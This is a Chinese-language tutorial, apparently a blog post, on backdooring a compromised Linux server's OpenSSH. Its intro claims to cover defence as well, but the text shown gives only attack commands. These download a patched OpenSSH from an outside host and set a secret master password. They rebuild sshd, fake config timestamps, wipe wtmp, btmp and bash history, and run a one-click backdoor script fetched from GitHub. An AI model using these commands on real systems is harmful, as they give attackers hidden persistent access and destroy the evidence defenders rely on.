相对于Windows操作系统,Linux操作系统的密码较难获取。而很多Linux服务器都配置了Openssh服务,在获取root权限的情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号密码,甚至可以留一个隐形的后门,达到长期控制linux服务器的目的。在很多Linux系统被入侵后都会在系统中留后门,使用OpenSSH留后门是入侵者的惯用方式之一,OpenSSh后门比较难于检测,本文就如何添加OpenSSH后门以及防范后门添加进行探讨。
1,补丁下载:
#wget http://www.mrliangqi.com/pack/openssh-5.9p1.zip
2,解压后文件修改记录日志及密码
# cd openssh-5.9p1
# openssl rand 6 -base64 随机生成密码
h7SWmK1V
# vim includes.h
#define ILOG “/tmp/ilog” 修改为空
#define OLOG “/tmp/olog” 修改为空
#define SECRETPW “system” 修改需要登录的密码h7SWmK1V
3,安装相关依赖
#yum install openssl openssl-devel pam-devel -y
4,备份原有配置文件
#cp -p /etc/ssh/sshd_config{,.bak}
5,编译安装
#./configure –prefix=/usr/ –sysconfdir=/etc/ssh/ –with-pam –with-kerberos5 && make && make install
6,恢复之前文件的创建时间
# cd /etc/ssh/
#touch -r sshd_config.bak ssh_config
7,重载登录
#service sshd reload
8,删除记录
删除ssh补丁包
# rm -rf openssh-5.9p1*
删除部分记录
#echo “”> /var/log/wtmp
#echo “”> /var/log/btmp
#echo “”> ./.bash_history
删除或者隐藏原本sshd配置文件
#mv sshd_config.bak .sshd_config.bak
脚本安装:
#wget https://raw.githubusercontent.com/yeohZhou/neiwang/master/sshBackdoorinsatll.sh --no-check
#mv sshBackdoorinsatll.sh /var/tmp/
#cd /var/tmp
#chmod +x sshBackdoorinsatll.sh
#ssh -V
#./sshBackdoorinsatll.sh OpenSSH_4.3 p2
#/etc/init.d/sshd restart
